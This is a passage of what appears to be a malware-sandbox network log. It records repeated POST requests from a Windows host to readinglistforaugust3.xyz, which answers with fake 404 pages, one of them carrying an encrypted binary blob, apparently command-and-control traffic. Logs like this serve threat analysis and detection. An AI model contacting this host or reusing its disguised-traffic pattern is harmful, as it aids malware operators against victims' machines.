c2 ab 06 50 77 5e e0 62 74 b1 ba 3f 42 57 e9 f4 4e 31 af 22 3b d7 af 49 27 b5 8c 9a b1 20 59 00 73 78 d0 5f 53 07 6a b3 f3 e2 fc 21 65 3a 5f db 53 4f 17 4c 87 3a c6 34 a3 e1 69 6b ff 44 00 e5 63 73 2f 67 b8 63 56 f2 b6 9c b2 75 36 05 f7 c6 a6 7f 21 79 26 ea ee f8 8e ec 19 42 fb 22 6d c1 df e4 bd be 75 2f d3 b2 cc 9f f9 5b aa cf 25 51 57 50 b6 4c 92 32 1b b0 b7 11 7f 63 99 42 8f 1b 74 7c ae 78 c0 49 b5 00 0c df 45 d6 99 23 9a 7f 4e 0c 96 26 c1 04 f3 87 57 67 c3 09 88 43 f4 6b 41 af 89 4b 9b a1 03 ee ec d6 97 ef ec 44 d9 f4 7f 60 98 2b ba ff 27 83 54 24 f8 e5 cc 7a 5a 0f 61 e0 63 89 f3 0c 28 51 b9 f6 12 63 8a 91 b3 1f a2 4e 37 ab d7 a8 05 3a 8b 62 44 85 d5 79 e1 34 75 2f 5b 9b e3 c1 78 f2 c8 79 8e 6b 4e d2 1d ef 0b d6 39 e1 fb 37 e1 7e 58 07 e0 f0 b4 2d 91 6c 38 8b 0d ad 0f 45 84 ac f1 cc e6 60 81 fe 0c 56 0c c1 60 e7 ab 64 47 d3 e3 71 0d b2 19 1f b7 1c 9a 71 41 2a 27 6f e8 ee 65 44 50 7f c8 f1 9d e8 b4 7f 5d 7e 8e b6 58 c4 f6 2d c9 24 c0 0f 0d e9 41 67 f3 66 56 a3 44 d1 c4 a3 85 4b e7 cb 8a 6c 61 29 78 d5 a2 1e 97 94 13 5a 93 db 14 d8 53 d4 25 4b f7 d5 84 e3 56 40 28 66 00 32 25 d4 a1 d4 da d5 e9 25 7b d4 ea 6e 30 da 17 e8 b4 31 e9 32 95 23 09 72 74 1e 97 85 ce bf 87 9d 85 9d ca 27 a9 da 4e 81 23 e6 0f ac 86 cd 87 3b fe e1 39 be 29 cb 6b 8d d3 13 ac ed 9a e3 cf 59 ad 37 fc 83 b0 bc af 0c b6 40 bc 36 85 ac 3d eb 95 d9 ac d0 90 bb ec b0 70 02 81 8c 28 3c d6 ef ff e6 84 27 ed 5c 88 3b c2 00 67 95 39 1c cb dc 34 29 98 ab d6 f1 57 2a 46 e9 cf 36 ba c6 23 d9 74 d5 74 6d d4 c8 e1 a9 7d 6b 3c 34 5e 44 d9 86 db 87 ce 1c f0 ea e2 33 dc b5 f7 53 19 e0 65 ca df 19 47 f7 a1 1c aa 9b 31 52 88 d7 9f 5c a9 02 9f 71 60 9c a7 34 98 c4 1c 5a d1 1f 15 cf 0a a9 c5 26 8b 3d 4d 7d 36 bd 05 1b 98 73 e8 5b 9a dd 94 5a Data Ascii: 3ff66w,Ct# [ubbxB"#z+ZQ787.R#T,dC?\|hCx1CrVOsb}_JVHPhc]-5;82N"E1__Wysrb342axx01O4]qc"OJm.4k'0wUJPG:TCd#dw@W2/f`dVWrmTN=MwR"'x:tQ'2CHC6_bfR-L1ZORTP`Oh2x-<zTQ]6&P09eTg%]=#d/Weg!Mw#ey&Vz#b&Sf8K-y!I%8eF.Q@+vhg{ qd&FPhCPw^bt?BWN1";I' Ysx_Sj!e:_SOL:4ikDcs/gcVu6!y&B"mu/[%QWPL2cBt\|xIE#N&WgCkAKD`+'T$zZac(QcN7:bDy4u/[xykN97~X-l8E`V`dGqqA'oeDP]~X-$AgfVDKla)xZS%KV@(f2%%{n012#rt'N#;9)kY7@6=p(<'\;g94)WF6#ttm}k<4^D3SeG1R\q`4Z&=M}6s[Z
Aug 24, 2021 08:46:56.022943974 CEST	11398	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 336 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:56.068566084 CEST	11399	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:56.093538046 CEST	11400	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 121 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:56.141657114 CEST	11401	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:46:56.155107975 CEST	11401	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 237 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:46:56.240142107 CEST	11403	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:46:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 33 66 66 36 36 0d 0a 00 00 a6 97 8c b4 08 02 7f 77 08 a7 e7 cb 2c c9 aa 43 96 74 c4 0c 23 20 5b f4 75 62 d6 86 a7 f2 12 bc a9 da 62 b6 a0 d6 8e 2a 03 c1 fe f5 78 80 42 09 22 23 7a 2b 5a be 51 83 37 f3 38 8f fd dd 37 2e 52 8c 23 e2 54 03 2c 1e 64 de 43 81 bc a4 b9 18 d8 e0 a3 e5 f9 b6 3f 7c 68 a0 d4 a1 a7 43 ab 78 a6 8f 31 88 43 72 56 b9 f9 4f 85 d1 73 62 c6 80 7d 19 09 03 aa d1 5f fb 83 4a 56 48 b2 50 68 63 5d d5 06 2d e0 35 a7 f9 a6 c2 ab e7 10 a3 d2 38 14 32 8f d7 8f 4e b3 00 be 22 88 c7 b7 de c7 87 45 c3 31 d5 a7 5f 81 cb bf 7a 43 79 93 73 72 62 19 33 be 34 16 e4 9c 32 11 61 7f 14 ef 78 78 30 be 80 f5 fd 31 4f c6 34 5d ee 71 0a 12 63 f7 cc eb eb 96 22 4f 81 4a c2 7c 6b ae 2e fa bc 06 b4 83 34 6b 27 30 77 1b bd 55 16 4a e2 50 47 9a 0e 3a 54 e9 43 82 e4 64 23 64 77 40 57 91 f8 32 2f 8f 66 60 93 9d b8 04 64 bf 83 c6 56 01 53 72 6d f1 d5 54 ce 08 cd f7 dd e2 f4 97 3d 17 c5 e6 c6 c6 09 b2 86 a4 a3 15 4d b1 77 12 ff a0 c1 94 52 07 2a 22 af 15 27 78 3a 02 f4 74 c6 51 e5 0d bb 27 32 43 c6 48 f8 87 a9 b2 c7 9e 43 b7 af 83 97 e1 1b d3 98 fe 36 5f 10 62 66 52 ef 2d 4c 31 5a 4f 52 54 9f 50 c5 0d 60 4f ff 1b 68 9b df 32 78 1d 2d ce d5 02 04 e7 14 ac f9 cc 13 91 3c 7a 54 19 51 5d 36 06 26 50 da 30 12 01 8e 39 cb a8 65 17 92 54 67 f4 c1 ed fe 25 0d 1e 5d ea e8 07 3d 23 db 64 bb 2f 57 a1 7f d1 8e 65 c8 f6 1d eb 67 b7 f9 21 4d f3 71 b5 e9 ab 1c 91 23 0c 14 be a3 a6 65 79 cc 26 56 7a b9 0a dc f6 23 62 26 0a c5 b7 c0 e4 66 93 38 b6 03 df 1d 2d 12 79 a4 21 49 e8 a8 25 99 a3 a0 cd 1b 38 c0 83 89 02 ed 02 65 12 aa 46 d0 d9 d6 b5 2e 51 fb ed 40 2b 76 1e 68 b3 01 67 cb 7b 58 71 b2 64 e1 26 15 96 a8 11 df f9 d4 af 46 50 bc db bb 68 fc 43 c2 ab 06 50 77 5e e0 62 74 b1 ba 3f 42 57 e9 f4 4e 31 c7 22 3b d7 af 49 27 b5 8c 9a b1 20 59 00 73 78 d0 5f 53 07 6a b3 f3 e2 fc 21 65 3a 53 db 53 4f 17 4c 87 3a ca 34 a3 e1 01 6b ff 44 00 e5 63 73 2f 67 b8 63 56 f2 b6 9c b2 75 36 05 f7 c6 a6 7f 21 79 26 ea 6e 84 8e ec 19 42 fb 22 6d c1 df e4 bd be 75 2f d3 b2 cc 9f f9 5b aa cf 25 51 57 50 b6 4c 92 32 1b b0 b7 11 7f 63 99 42 21 10 74 7c 2e 6b c0 49 1b 0b 0c df 61 d6 99 23 9a 7f 4e 0c 96 26 c1 04 f3 87 57 67 c3 09 88 43 f4 6b 41 af 89 4b 9b 45 07 ee ec d6 b7 f0 ec 44 d5 f4 7f 60 0e 23 ba ff 27 83 54 24 f8 e5 cc 7a 5a 0f 61 e0 63 89 f3 0c 28 51 b9 f6 12 63 8a 91 b3 1f a2 4e 37 ab d7 a8 05 3a 8b 62 44 85 d5 79 e1 34 75 2f 5b 9b e3 c1 78 f2 c8 79 8e 6b 4e d2 1d ef 0b d6 39 e1 fb 37 e1 7e 58 07 e0 f0 b4 2d 91 6c 38 8b 0d ad 0f 45 84 ac f1 cc e6 60 81 fe 0c 56 0c c1 60 e7 ab 64 47 d3 e3 71 0d b2 19 1f b7 1c 9a 71 41 2a 27 6f e8 ee 65 44 50 7f c8 f1 9d e8 b4 7f 5d 7e 8e b6 58 c4 f6 2d c9 24 c0 0f 0d e9 41 67 f3 66 56 a3 44 d1 c4 a3 85 4b e7 cb 8a 6c 61 29 78 d5 a2 1e 97 94 13 5a 93 db 14 d8 53 d4 25 4b f7 d5 84 e3 56 40 28 66 00 32 25 d4 a1 d4 da d5 e9 25 7b d4 ea 6e 30 da 17 e8 b4 31 e9 32 95 23 09 72 74 1e 97 85 ce bf 87 9d 85 9d ca 27 a9 da 4e 81 23 e6 0f ac 86 cd 87 3b fe e1 39 be 29 cb 6b 8d d3 13 ac ed 9a e3 cf 59 ad 37 fc 83 b0 bc af 0c b6 40 bc 36 85 ac 3d eb 95 d9 ac d0 90 bb ec b0 70 02 81 8c 28 3c d6 ef ff e6 84 27 ed 5c 88 3b c2 00 67 95 39 1c cb dc 34 29 98 ab d6 f1 57 2a 46 19 cc 36 ba c6 23 d9 74 d5 74 6d d4 c8 e1 a9 7d 6b 3c 34 5e a0 df 86 db 87 ce 1c f0 e2 e2 33 dc 29 f0 53 19 d0 65 ca df 19 47 f7 a1 1c aa 9b 31 52 88 d7 9f 5c a9 02 9f 71 60 9c a7 34 98 c4 1c 5a d1 1f 15 cf 0a a9 c5 26 8b 3d 4d 7d 36 bd 05 1b 98 73 e8 5b 9a dd 94 5a Data Ascii: 3ff66w,Ct# [ubbxB"#z+ZQ787.R#T,dC?\|hCx1CrVOsb}_JVHPhc]-582N"E1_zCysrb342axx01O4]qc"OJ\|k.4k'0wUJPG:TCd#dw@W2/f`dVSrmT=MwR"'x:tQ'2CHC6_bfR-L1ZORTP`Oh2x-<zTQ]6&P09eTg%]=#d/Weg!Mq#ey&Vz#b&f8-y!I%8eF.Q@+vhg{Xqd&FPhCPw^bt?BWN1";I' Ysx_Sj!e:SSOL:4kDcs/gcVu6!y&nB"mu/[%QWPL2cB!t\|.kIa#N&WgCkAKED`#'T$zZac(QcN7:bDy4u/[xykN97~X-l8E`V`dGqqA'oeDP]~X-$AgfVDKla)xZS%KV@(f2%%{n012#rt'N#;9)kY7@6=p(<'\;g94)WF6#ttm}k<4^3)SeG1R\q`4Z&=M}6s[Z
Aug 24, 2021 08:47:01.076400042 CEST	16461	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 148 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:47:01.123358965 CEST	16462	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:47:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:47:01.141494989 CEST	16462	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 335 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:47:01.187531948 CEST	16464	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:47:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:47:01.199949980 CEST	16464	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 361 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:47:01.251000881 CEST	16465	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:47:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:47:01.288484097 CEST	16465	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 135 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:47:01.336260080 CEST	16466	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:47:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:47:01.387686014 CEST	16467	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 202 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:47:01.435610056 CEST	16468	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:47:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 